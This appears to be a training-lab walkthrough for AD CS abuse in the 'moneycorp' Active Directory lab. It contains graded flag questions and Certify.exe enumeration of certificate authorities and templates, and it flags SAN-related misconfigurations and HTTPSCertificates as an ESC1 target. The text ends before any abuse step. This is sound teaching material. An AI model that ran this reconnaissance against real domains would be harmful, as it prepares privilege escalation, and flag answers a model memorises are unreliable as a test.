Learning Object 21
Tasks
1 – Check if AD CS is used by the target forest and find any vulnerable/abusable templates
2 – Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin
Flag 33 [dcorp-dc] – Name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT 🚩
Flag 34 [dcorp-dc] – Name of the AD CS template that has EKU of Certificate Request Agent and grants enrollment rights to Domain Users 🚩
Flag 35 [dcorp-dc] – Name of the CA attribute that allows requestor to provide Subject Alternative Names 🚩
Flag 36 [dcorp-dc] – Name of the group that has enrollment rights on the CA-Integration template 🚩
Solutions
1 – Check if AD CS is used by the target forest and find any vulnerable/abusable templates
We can use the Certify tool to check for AD CS in moneycorp.
C:\AD\Tools\Certify.exe casC:\Users\student98>C:\AD\Tools\Certify.exe cas
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate authorities
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Root CAs
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[*] NTAuthCertificates - Certificates that enable authentication:
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[*] Enterprise/Enrollment CAs:
Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None
Enabled Certificate Templates:
CA-Integration
HTTPSCertificates
SmartCardEnrollment-Agent
SmartCardEnrollment-Users
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
Certify completed in 00:00:32.5198115
C:\Users\student98>
.
We can list all the templates using the following command. Going through the output we can find some interesting templates:
C:\AD\Tools\Certify.exe findC:\Users\student98>c:\ad\tools\certify.exe find
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'
Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Users S-1-5-21-335606122-960912869-3279953914-513
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Users S-1-5-21-335606122-960912869-3279953914-513
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Computers S-1-5-21-335606122-960912869-3279953914-515
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Users
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 1
Application Policies : Certificate Request Agent
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : CA-Integration
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Certify completed in 00:00:16.3671521
C:\Users\student98>
.
Privilege Escalation to DA and EA using ESC1
The template HTTPSCertificates looks interesting. Let’s get some more information about it as it allows requestor to supply subject name:
C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubjectC:\Users\student98>c:\ad\tools\certify.exe find /enrolleeSuppliesSubject
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'
Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None
Enabled certificate templates where users can supply a SAN:
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
